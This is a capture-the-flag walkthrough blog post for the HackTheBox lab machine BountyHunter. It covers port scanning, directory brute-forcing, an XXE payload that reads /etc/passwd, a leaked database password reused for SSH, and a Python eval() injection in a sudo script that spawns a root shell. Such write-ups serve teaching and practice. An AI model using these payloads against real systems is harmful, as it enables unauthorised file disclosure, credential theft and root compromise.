BountyHunter WalkThrough — HackTheBox

Hey my friends, I’m Adham Makroum aka 0xmkr24, Today I’ll root BountyHunter Box which is retired today, try to simplify it for you and i wish this write-up be useful for you

Now let’s Start Hacking!

Nmap Scanning

# sudo  nmap -sV -sS -T4 -A -Pn -p1-65535 -oN nmap.txt 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.29s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=8/22%OT=22%CT=1%CU=38556%PV=Y%DS=2%DC=T%G=Y%TM=6122CD0
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
OS:1NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 503.45 ms 10.10.16.1
2 332.34 ms 10.10.11.100

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 1278.13 seconds

We have 2 ports opens

  • Port 22: running OpenSSH 8.2p1
  • Port 80: running Apache httpd 2.4.41

Enumeration

Visit the application

Check from portal

it provides us another page

it’s interesting form but let us run gobuster then will return to it

Gobuster

┌──(kali㉿0xmkr24)-[~/Desktop/HTB/BugBounty] └─$ gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt  =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url:            http://10.10.11.100 [+] Threads:        10 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt [+] Status codes:   200,204,301,302,307,401,403 [+] User Agent:     gobuster/3.0.1 [+] Extensions:     html,txt,php [+] Timeout:        10s =============================================================== 2021/09/02 11:09:32 Starting gobuster =============================================================== /.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/assets (Status: 301)
/css (Status: 301)
/db.php (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/portal.php (Status: 200)
/resources (Status: 301)
/server-status (Status: 403) =============================================================== 2021/09/02 11:19:56 Finished ===============================================================

We have interesting directories

  • /db.php
  • /resources

I visited db.php but found nothing so let’s visit resources.php

let’s see what’s in README.txt

let us return to portal and open burp then enable intercept

the data are sent as encoded so let us try to decrypt it

Base64 then URL encode

I searched for XML v1.0 vulnerabilities and found out it was XXE vulnerability but I hadn’t learned about it yet so I decided to read about it from owasp and portwigger then solve some labs to be more understanding of this vulnerability and see how can i exploit it

Then I searched for payloads to exploit it and you can found some useful payloads here

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> <bugreport>
<title>&ent;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>

now replace it in data parameter and encode it with URL encoding by ctrl + u

there is development user

now we need a password to connect with ssh

let us try to open db.php

i used this payload

php://filter : allow the attacker to include local file and base64 encode as the output

we got encoded data so let us decode it

<?php 
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

now try this password with development user to connect with ssh

ssh development@10.10.11.100
m19RoAU0hP41A1sTsq6K

Bingo we get a user.txt

Privilege Escalation

this is a time to take full access on this box

try sudo -l to see what are our privileges

there’s a script we can execute and get a root, so let us see what is in it

I copy all lines and run it on vs code to debug it and understand how is it work, So let me explain to you what I understood

there is an eval() function, it can be used to achieve authentication bypass and even code injection.

The eval() function in Python takes strings and execute them as code. For example, eval(‘1+1’) would return 2.

for more information about it and other dangerous functions, how can you exploit it to execute arbitrary code on the system you can read this writeup.

After understanding a script what are we need?

We nead a file with .md extention
fitst line start with “# Skytrain Inc”
second line start with “## Ticket to “
third line start with “__Ticket Code:__”
fourth line start with “**” and a number divided by 7 like 704

I created root.md

# Skytrain Inc 
## Ticket to
__Ticket Code:__
**704+ __import__('os').system('/bin/bash')

now run our script with sudo

and congrats we became a roooooot!!!

Thanks for reading, I hope my write-up was useful for you. Feel free to connect with me on Twitter or Linkedin.

--

--

--

infosec guy who seeks knowledge.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

VooVoo NFTs now available through GoCrypto

A Framework for Maturing Security

Lunaverse Airdrop

What is the AGOV token?

What is cryptography ?

Using Fingerprint Biometric For Attendance and Security? 7 Things You Must Know

The Tor Architecture and its Inherent Security Implications

Property Technology For Coworking Spaces

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adham A. Makroum

Adham A. Makroum

infosec guy who seeks knowledge.

More from Medium

Privilege Escalation | Kenobi Walkthrough | Part 2

Creating easy proof-of-concept scripts with Python and Curl.

HTB: Granny Writeup w/o Metasploit

TryHackMe: Subdomain Enumeration Writeup

Subdomain Enumeration Room’s Logo on TryHackMe